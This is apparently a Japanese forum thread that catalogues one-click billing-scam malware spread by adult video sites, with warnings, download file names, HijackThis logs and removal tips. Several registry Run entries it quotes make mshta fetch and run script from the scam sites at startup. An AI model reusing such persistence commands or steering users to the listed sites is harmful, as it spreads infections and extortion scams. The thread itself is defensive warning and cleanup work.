» 楽天ぴたっとアド「サイトに合った広告を!」 » bbsee無料掲示板 . 検索 オプション 購読

ワンクリウェア画像

記載してあるURLはワンクリウェア( malicious software )をダウンロードさせるサイトもありますので、むやみにアクセスしないで下さい。 当掲示板についてはHOME「注 (http://bbsee.info/nekoou/id/69.html)へ飛びます」と書いてある緑色のタグをクリックして、お読み下さい。ワンクリウェア( malicious software )の駆除法については当該掲示板では答える事はしません。

話題

[212]アダルト動画 ADULT COLLECTION (3)[240] Erofilehost.com(8)[390] HMV(4)[386]TIGER(3)[315]PICKUP(3)[379]Bigmovie(4)[199]   ADULT DREAM INDEX(3)[372]ギャルっこムービー(2)
→新しい話題を投稿する
65432»

アダルト動画 ADULT COLLECTION 

#212名前:いぬ時刻:2009-10-02 22:07:27返信IP:FLH1Aau207.myz.mesh.ad.jpID:1485a043

  http://www.adult-collection09.net/
警告:
このURLにアクセスし動画ファイルをダウンロードするとワンクリウェア( malicious software )すなわち悪意あるソフトウェアに感染するおそれがあります。

ダウンロードするファイルは「videofile(3桁の整数).hta」

Re:アダルト動画 ADULT COLLECTION 

#213名前:いぬ時刻:2009-10-02 22:09:30返信IP:FLH1Aau207.myz.mesh.ad.jpID:1485a043

「mshta」が稼動しています。

Re:アダルト動画 ADULT COLLECTION 

#214名前:いぬ時刻:2009-10-02 22:10:26返信IP:FLH1Aau207.myz.mesh.ad.jpID:1485a043

削除するスタートアップの記述

Re:アダルト動画 ADULT COLLECTION 

#236名前:いぬ時刻:2009-10-09 19:34:17返信IP:FLH1Aav082.myz.mesh.ad.jpID:e7970245

貼り付け画像が替わったようです。

 Erofilehost.com

#240名前:いぬ時刻:2009-10-16 20:40:56返信IP:FLH1Aay129.myz.mesh.ad.jpID:0463e593

  http://ero-filehost.com/
警告:
このURLにアクセスし動画ファイルをダウンロードするとワンクリウェア( malicious software )すなわち悪意あるソフトウェアに感染するおそれがあります。

ダウンロードするファイルは「MoviePlayer.exe」

C:\Program Files\Balloon\update.exe
C:\Program Files\Balloon\TaskBarNotifier.exe

O4 - HKLM\..\Run: [Balloon] C:\Program Files\Balloon\balloon.exe
O4 - HKLM\..\Run: [BalloonUpdater] C:\Program Files\Balloon\update.exe

Re: Erofilehost.com

#242名前:いぬ時刻:2009-10-16 20:53:14返信IP:FLH1Aay129.myz.mesh.ad.jpID:0463e593

タスクマネージャーの様子。

「TaskBarNotifier.exe」は「入会完了」画面

「balloon.exe」は左側の「お知らせ」画面

「update.exe」はお知らせ画面の中に「ペコペコ」と言う音と共にURLを書き足して行くのだと思います。

Re: Erofilehost.com

#243名前:いぬ時刻:2009-10-16 21:03:06返信IP:FLH1Aay129.myz.mesh.ad.jpID:0463e593

スタートアップの記述

Re: Erofilehost.com

#244名前:いぬ時刻:2009-10-16 21:06:56返信IP:FLH1Aay129.myz.mesh.ad.jpID:0463e593

ファイルはまとめて「Program Files\Balloon」の中に作られるので「Balloon」ごと削除した方がイイでしょう。

レジストリのキャプチャは面倒なので省略w

Re: Erofilehost.com

#282名前:いぬ時刻:2009-11-23 20:49:39返信IP:FLH1Aal065.myz.mesh.ad.jpID:29a3bc98

ワンクリウェアのタイプが新しくなったようです。
今度はhtaファイルを使用しています。
ダウンロードするファイル「movie_test.hta」

貼り付く画像も変わってます。

Re: Erofilehost.com

#283名前:いぬ時刻:2009-11-23 20:50:47返信IP:FLH1Aal065.myz.mesh.ad.jpID:29a3bc98

スタートアップの記述

Re: Erofilehost.com

#290名前:いぬ時刻:2009-11-26 20:12:35返信IP:FL1-122-131-2-101.myz.mesh.ad.jpID:9d35a6f3

ダウンロードファイルが「movie.hta」に変更されました。

Re: Erofilehost.com

#349名前:いぬ時刻:2010-02-02 20:26:18返信IP:FLH1Aau182.myz.mesh.ad.jpID:76b361b9

ウェアが新しいタイプになったかも知れません。

スタートアップに記述されないようです。

C:\Windows\system32\mshta.exe
O4 - HKCU\..\Run: [system_boot_d06de2c5bf02a9a8ec0e3d395e0f9bea] C:\Windows\system32\mshta h ttp://ero-filehost.com/reg2.php?cid=d06de2c5bf02a9a8ec0e3d395e0f9bea

Re: Erofilehost.com

#376名前:いぬ時刻:2010-02-13 23:59:47返信IP:FLH1Aba066.myz.mesh.ad.jpID:2ee09058

ダウンロードファイル「efhmovie.hta」に変更されいます。

4 - HKCU\..\Run: [system_boot_4a6864f65f2a86722a4747d2d1b61b2a] C:\Windows\system32\mshta http://ero-filehost.com/reg2.php?cid=4a6864f65f2a86722a4747d2d1b61b2a

 HMV

#390名前:いぬ時刻:2010-03-14 18:30:16返信IP:FLH1Aap024.myz.mesh.ad.jpID:74c3e074

http://www.hmv-mov.com/
警告:
このURLにアクセスし動画ファイルをダウンロードするとワンクリウェア( malicious software )すなわち悪意あるソフトウェアに感染するおそれがあります。

ダウンロードファイル「movie_(10桁の数字).hta」

C:\Windows\system32\mshta.exe
O4 - HKCU\..\Run: [shhm] C:\WINDOWS\system32\mshta.exe "C:\Documents and Settings\***\Application Data\shhm\movie.hta"

Re: HMV

#391名前:いぬ時刻:2010-03-14 18:30:57返信IP:FLH1Aap024.myz.mesh.ad.jpID:74c3e074

「mshta.exe」が実行されてます。

Re: HMV

#392名前:いぬ時刻:2010-03-14 18:31:55返信IP:FLH1Aap024.myz.mesh.ad.jpID:74c3e074

フォルダを作って格納しています。

Re: HMV

#393名前:いぬ時刻:2010-03-14 18:33:26返信IP:FLH1Aap024.myz.mesh.ad.jpID:74c3e074

フォルダの中身

Re: HMV

#394名前:いぬ時刻:2010-03-14 18:34:31返信IP:FLH1Aap024.myz.mesh.ad.jpID:74c3e074

スタートアップの記述

TIGER

#386名前:いぬ時刻:2010-03-08 05:40:41返信IP:FLH1Aba118.myz.mesh.ad.jpID:712a6cae

http://www.a-tiger.net/

警告:
このURLにアクセスし動画ファイルをダウンロードするとワンクリウェア( malicious software )すなわち悪意あるソフトウェアに感染するおそれがあります。

ダウンロードファイル「player.hta」

O4 - HKCU\..\Run: [za] mshta "C:\Users\****\AppData\Roaming\E3GLMQSV.hta"

Re:TIGER

#387名前:いぬ時刻:2010-03-08 05:42:01返信IP:FLH1Aba118.myz.mesh.ad.jpID:712a6cae

「mshta.exe」が実行されてます。

Re:TIGER

#388名前:いぬ時刻:2010-03-08 05:43:45返信IP:FLH1Aba118.myz.mesh.ad.jpID:712a6cae

ファイルを作って格納しています。

Re:TIGER

#389名前:いぬ時刻:2010-03-08 05:44:40返信IP:FLH1Aba118.myz.mesh.ad.jpID:712a6cae

スタートアップの記述

PICKUP

#315名前:いぬ時刻:2009-12-26 08:32:14返信IP:FLH1Aaw115.myz.mesh.ad.jpID:33822d4d

http://www.m-pu.net/
警告:
このURLにアクセスし動画ファイルをダウンロードするとワンクリウェア( malicious software )すなわち悪意あるソフトウェアに感染するおそれがあります。

ダウンロードファイルは「admpu10桁の数字.hta」

Re:PICKUP

#316名前:いぬ時刻:2009-12-26 08:34:02返信IP:FLH1Aax090.myz.mesh.ad.jpID:495b4425

このようにフォルダが作成されます。

Re:PICKUP

#317名前:いぬ時刻:2009-12-26 08:35:31返信IP:FLH1Aaw115.myz.mesh.ad.jpID:33822d4d

プロセスとレジストリのキーの値
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 6:40:51, on 2009/12/26
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16945)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
c:\Program Files\Microsoft Security Essentials\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Virtual Machine Additions\vmusrvc.exe
C:\Program Files\Microsoft Security Essentials\msseces.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Virtual Machine Additions\vmsrvc.exe
C:\Program Files\Virtual Machine Additions\vpcmap.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\mshta.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

O4 - HKLM\..\Run: [VMUserServices] C:\Program Files\Virtual Machine Additions\vmusrvc.exe
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [MSSE] "c:\Program Files\Microsoft Security Essentials\msseces.exe" -hide
O4 - HKLM\..\Run: [webadmpu] rundll32.exe "C:\Documents and Settings\All Users\Application Data\admpu\message.dll",_goMES@16 C:\Documents and Settings\All Users\Application Data\admpu\229YH681.hta
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [ctfmon.exe] ctfmon.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [ctfmon.exe] ctfmon.exe (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [ctfmon.exe] ctfmon.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [ctfmon.exe] ctfmon.exe (User 'Default user')
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1239606247541
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab

--
End of file - 2875 bytes

rundll32.exe "C:\Documents and Settings\All Users\Application Data\admpu\message.dll",_goMES@16 C:\Documents and Settings\All Users\Application Data\admpu\35748X38.hta

Re:PICKUP

#318名前:いぬ時刻:2009-12-26 09:20:15返信IP:FLH1Aaw115.myz.mesh.ad.jpID:33822d4d

この手の新しいタイプワンクリウェアの駆除法としては、

まず、セーフモードで立ち上げる。
このPICKUP「m-pu.net/」でしたら「admpu」を検索。
レジストリエディタを立ち上げ、「admpu」に関するキーを削除する。

Bigmovie

#379名前:いぬ時刻:2010-02-24 19:28:36返信IP:FL1-125-199-182-146.myz.mesh.ad.jpID:61d96bcf

http://www.big-mov.com/

警告:
このURLにアクセスし動画ファイルをダウンロードするとワンクリウェア( malicious software )すなわち悪意あるソフトウェアに感染するおそれがあります。

ダウンロードファイル「mov.hta」

C:\WINDOWS\system32\mshta.exe
O4 - HKCU\..\Run: [www.big-mov.com] mshta "C:\Documents and Settings\ねこ王\Application Data\mov\76492-OEM-0074782-47264.hta" 2

Re:Bigmovie

#380名前:いぬ時刻:2010-02-24 19:29:42返信IP:FL1-125-199-182-146.myz.mesh.ad.jpID:61d96bcf

「mshta.exe」が実行されてます。

Re:Bigmovie

#381名前:いぬ時刻:2010-02-24 19:30:35返信IP:FL1-125-199-182-146.myz.mesh.ad.jpID:61d96bcf

スタートアップの記述

Re:Bigmovie

#382名前:いぬ時刻:2010-02-24 19:31:21返信IP:FL1-125-199-182-146.myz.mesh.ad.jpID:61d96bcf

フォルダも作ります。

Re:Bigmovie

#383名前:いぬ時刻:2010-02-24 19:40:34返信IP:FL1-125-199-182-146.myz.mesh.ad.jpID:61d96bcf

Windows vistaでは

   ADULT DREAM INDEX

#199名前:いぬ時刻:2009-09-25 19:02:21返信IP:FLH1Abc234.myz.mesh.ad.jpID:55263e86

   http://adult-dream.net/
警告:
このURLにアクセスし動画ファイルをダウンロードするとワンクリウェア( malicious software )すなわち悪意あるソフトウェアに感染するおそれがあります。
ダウンロードするファイルは「adultwmv***.hta」
***は3桁の数字

Re:   ADULT DREAM INDEX

#200名前:いぬ時刻:2009-09-25 19:06:03返信IP:FLH1Abc234.myz.mesh.ad.jpID:55263e86

Windows XPやWindows7でこのファイルを実行すると#199のような画像が張り付きます。

Re:   ADULT DREAM INDEX

#201名前:いぬ時刻:2009-09-25 19:07:26返信IP:FLH1Abc234.myz.mesh.ad.jpID:55263e86

「mshta.exe」が稼動しています。

Re:   ADULT DREAM INDEX

#202名前:いぬ時刻:2009-09-25 19:12:33返信IP:FLH1Abc234.myz.mesh.ad.jpID:55263e86

スタートアップから「www.adult-dream.net」の記述を削除し、ダウンロードした「adultwmv***.hta」があるならそれも削除すれば、画像は出現しません。

ギャルっこムービー

#372名前:いぬ時刻:2010-02-13 08:40:58返信IP:FLH1Aaz225.myz.mesh.ad.jpID:02c61e34

http://www.galcco.com/?r=1

警告:
このURLにアクセスし動画ファイルをダウンロードするとワンクリウェア( malicious software )すなわち悪意あるソフトウェアに感染するおそれがあります。

ダウンロードファイル「galmovie.hta」

O4 - HKCU\..\Run: [system_boot_fb180618552f6f007b4d03e127731966] C:\Windows\system32\mshta http://www.galcco.com/reg2.php?cid=fb180618552f6f007b4d03e127731966

Re:ギャルっこムービー

#373名前:いぬ時刻:2010-02-13 08:41:53返信IP:FLH1Aaz225.myz.mesh.ad.jpID:02c61e34

「mshta.exe」が実行されてます。

Re:ギャルっこムービー

#374名前:いぬ時刻:2010-02-13 08:44:55返信IP:FLH1Aaz225.myz.mesh.ad.jpID:02c61e34

スタートアップの記述

65432»
パスワード:
Powered by bbsee.info. Copyright © 2005-2010
HTML generated at 2010-03-19 06:49:27 (0.095 sec).